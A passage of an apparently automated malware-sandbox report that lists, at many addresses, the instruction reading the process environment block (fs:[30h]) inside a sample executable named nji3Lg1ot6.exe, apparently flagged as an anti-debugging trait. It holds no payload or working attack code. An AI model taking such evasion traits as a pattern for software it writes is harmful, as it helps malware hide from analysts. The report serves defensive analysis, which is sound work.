          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]1_2_00ABB8D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]1_2_00A5002D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]1_2_00A5002D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]1_2_00A5002D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]1_2_00A5002D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]1_2_00A5002D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]1_2_00A3B02A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]1_2_00A3B02A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]1_2_00A3B02A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]1_2_00A3B02A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]1_2_00A4A830
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]1_2_00A4A830
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]1_2_00A4A830
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]1_2_00A4A830
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF4015 mov eax, dword ptr fs:[00000030h]1_2_00AF4015
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF4015 mov eax, dword ptr fs:[00000030h]1_2_00AF4015
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7016 mov eax, dword ptr fs:[00000030h]1_2_00AA7016
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7016 mov eax, dword ptr fs:[00000030h]1_2_00AA7016
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7016 mov eax, dword ptr fs:[00000030h]1_2_00AA7016
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF1074 mov eax, dword ptr fs:[00000030h]1_2_00AF1074
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE2073 mov eax, dword ptr fs:[00000030h]1_2_00AE2073
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A40050 mov eax, dword ptr fs:[00000030h]1_2_00A40050
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A40050 mov eax, dword ptr fs:[00000030h]1_2_00A40050
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A561A0 mov eax, dword ptr fs:[00000030h]1_2_00A561A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A561A0 mov eax, dword ptr fs:[00000030h]1_2_00A561A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]1_2_00AE49A4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]1_2_00AE49A4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]1_2_00AE49A4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]1_2_00AE49A4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA69A6 mov eax, dword ptr fs:[00000030h]1_2_00AA69A6
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]1_2_00AA51BE
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]1_2_00AA51BE
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]1_2_00AA51BE
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]1_2_00AA51BE
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5A185 mov eax, dword ptr fs:[00000030h]1_2_00A5A185
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4C182 mov eax, dword ptr fs:[00000030h]1_2_00A4C182
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52990 mov eax, dword ptr fs:[00000030h]1_2_00A52990
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A2B1E1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A2B1E1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A2B1E1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AB41E8 mov eax, dword ptr fs:[00000030h]1_2_00AB41E8
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]1_2_00A44120
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]1_2_00A44120
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]1_2_00A44120
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]1_2_00A44120
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120 mov ecx, dword ptr fs:[00000030h]1_2_00A44120
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5513A mov eax, dword ptr fs:[00000030h]1_2_00A5513A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5513A mov eax, dword ptr fs:[00000030h]1_2_00A5513A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29100 mov eax, dword ptr fs:[00000030h]1_2_00A29100
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29100 mov eax, dword ptr fs:[00000030h]1_2_00A29100
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29100 mov eax, dword ptr fs:[00000030h]1_2_00A29100
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2C962 mov eax, dword ptr fs:[00000030h]1_2_00A2C962
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2B171 mov eax, dword ptr fs:[00000030h]1_2_00A2B171
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2B171 mov eax, dword ptr fs:[00000030h]1_2_00A2B171
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B944 mov eax, dword ptr fs:[00000030h]1_2_00A4B944
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B944 mov eax, dword ptr fs:[00000030h]1_2_00A4B944
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]1_2_00A252A5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]1_2_00A252A5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]1_2_00A252A5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]1_2_00A252A5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]1_2_00A252A5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A3AAB0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A3AAB0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5FAB0 mov eax, dword ptr fs:[00000030h]1_2_00A5FAB0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5D294 mov eax, dword ptr fs:[00000030h]1_2_00A5D294
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5D294 mov eax, dword ptr fs:[00000030h]1_2_00A5D294
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52AE4 mov eax, dword ptr fs:[00000030h]1_2_00A52AE4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52ACB mov eax, dword ptr fs:[00000030h]1_2_00A52ACB
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A64A2C mov eax, dword ptr fs:[00000030h]1_2_00A64A2C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A64A2C mov eax, dword ptr fs:[00000030h]1_2_00A64A2C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]1_2_00A4A229
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A38A0A mov eax, dword ptr fs:[00000030h]1_2_00A38A0A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A25210 mov eax, dword ptr fs:[00000030h]1_2_00A25210
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A25210 mov ecx, dword ptr fs:[00000030h]1_2_00A25210
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A25210 mov eax, dword ptr fs:[00000030h]1_2_00A25210
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A25210 mov eax, dword ptr fs:[00000030h]1_2_00A25210
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2AA16 mov eax, dword ptr fs:[00000030h]1_2_00A2AA16
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2AA16 mov eax, dword ptr fs:[00000030h]1_2_00A2AA16
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A43A1C mov eax, dword ptr fs:[00000030h]1_2_00A43A1C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEAA16 mov eax, dword ptr fs:[00000030h]1_2_00AEAA16
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEAA16 mov eax, dword ptr fs:[00000030h]1_2_00AEAA16
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADB260 mov eax, dword ptr fs:[00000030h]1_2_00ADB260
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADB260 mov eax, dword ptr fs:[00000030h]1_2_00ADB260
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8A62 mov eax, dword ptr fs:[00000030h]1_2_00AF8A62
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A6927A mov eax, dword ptr fs:[00000030h]1_2_00A6927A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]1_2_00A29240
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]1_2_00A29240
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]1_2_00A29240
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]1_2_00A29240
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEEA55 mov eax, dword ptr fs:[00000030h]1_2_00AEEA55
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AB4257 mov eax, dword ptr fs:[00000030h]1_2_00AB4257
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54BAD mov eax, dword ptr fs:[00000030h]1_2_00A54BAD
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54BAD mov eax, dword ptr fs:[00000030h]1_2_00A54BAD
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54BAD mov eax, dword ptr fs:[00000030h]1_2_00A54BAD
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF5BA5 mov eax, dword ptr fs:[00000030h]1_2_00AF5BA5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE138A mov eax, dword ptr fs:[00000030h]1_2_00AE138A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A31B8F mov eax, dword ptr fs:[00000030h]1_2_00A31B8F
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A31B8F mov eax, dword ptr fs:[00000030h]1_2_00A31B8F
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADD380 mov ecx, dword ptr fs:[00000030h]1_2_00ADD380
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52397 mov eax, dword ptr fs:[00000030h]1_2_00A52397
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5B390 mov eax, dword ptr fs:[00000030h]1_2_00A5B390
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]1_2_00A503E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]1_2_00A503E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]1_2_00A503E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]1_2_00A503E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]1_2_00A503E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]1_2_00A503E2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A4DBE9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA53CA mov eax, dword ptr fs:[00000030h]1_2_00AA53CA
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA53CA mov eax, dword ptr fs:[00000030h]1_2_00AA53CA
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE131B mov eax, dword ptr fs:[00000030h]1_2_00AE131B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A2DB60
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A53B7A mov eax, dword ptr fs:[00000030h]1_2_00A53B7A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A53B7A mov eax, dword ptr fs:[00000030h]1_2_00A53B7A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2DB40 mov eax, dword ptr fs:[00000030h]1_2_00A2DB40
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8B58 mov eax, dword ptr fs:[00000030h]1_2_00AF8B58
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2F358 mov eax, dword ptr fs:[00000030h]1_2_00A2F358
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3849B mov eax, dword ptr fs:[00000030h]1_2_00A3849B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE14FB mov eax, dword ptr fs:[00000030h]1_2_00AE14FB
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AA6CF0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AA6CF0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AA6CF0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8CD6 mov eax, dword ptr fs:[00000030h]1_2_00AF8CD6
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5BC2C mov eax, dword ptr fs:[00000030h]1_2_00A5BC2C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6C0A mov eax, dword ptr fs:[00000030h]1_2_00AA6C0A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6C0A mov eax, dword ptr fs:[00000030h]1_2_00AA6C0A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6C0A mov eax, dword ptr fs:[00000030h]1_2_00AA6C0A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6C0A mov eax, dword ptr fs:[00000030h]1_2_00AA6C0A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF740D mov eax, dword ptr fs:[00000030h]1_2_00AF740D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF740D mov eax, dword ptr fs:[00000030h]1_2_00AF740D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF740D mov eax, dword ptr fs:[00000030h]1_2_00AF740D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]1_2_00AE1C06
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4746D mov eax, dword ptr fs:[00000030h]1_2_00A4746D
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5A44B mov eax, dword ptr fs:[00000030h]1_2_00A5A44B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABC450 mov eax, dword ptr fs:[00000030h]1_2_00ABC450
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABC450 mov eax, dword ptr fs:[00000030h]1_2_00ABC450
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF05AC mov eax, dword ptr fs:[00000030h]1_2_00AF05AC
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF05AC mov eax, dword ptr fs:[00000030h]1_2_00AF05AC
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A535A1 mov eax, dword ptr fs:[00000030h]1_2_00A535A1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A51DB5 mov eax, dword ptr fs:[00000030h]1_2_00A51DB5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A51DB5 mov eax, dword ptr fs:[00000030h]1_2_00A51DB5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A51DB5 mov eax, dword ptr fs:[00000030h]1_2_00A51DB5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581 mov eax, dword ptr fs:[00000030h]1_2_00A52581
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581 mov eax, dword ptr fs:[00000030h]1_2_00A52581
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581 mov eax, dword ptr fs:[00000030h]1_2_00A52581
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581 mov eax, dword ptr fs:[00000030h]1_2_00A52581
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]1_2_00A22D8A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]1_2_00A22D8A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]1_2_00A22D8A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]1_2_00A22D8A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]1_2_00A22D8A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5FD9B mov eax, dword ptr fs:[00000030h]1_2_00A5FD9B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5FD9B mov eax, dword ptr fs:[00000030h]1_2_00A5FD9B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A3D5E0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A3D5E0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]1_2_00AEFDE2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]1_2_00AEFDE2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]1_2_00AEFDE2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]1_2_00AEFDE2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AD8DF1 mov eax, dword ptr fs:[00000030h]1_2_00AD8DF1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AA6DC9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AA6DC9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AA6DC9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h]1_2_00AA6DC9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AA6DC9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AA6DC9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2AD30 mov eax, dword ptr fs:[00000030h]1_2_00A2AD30
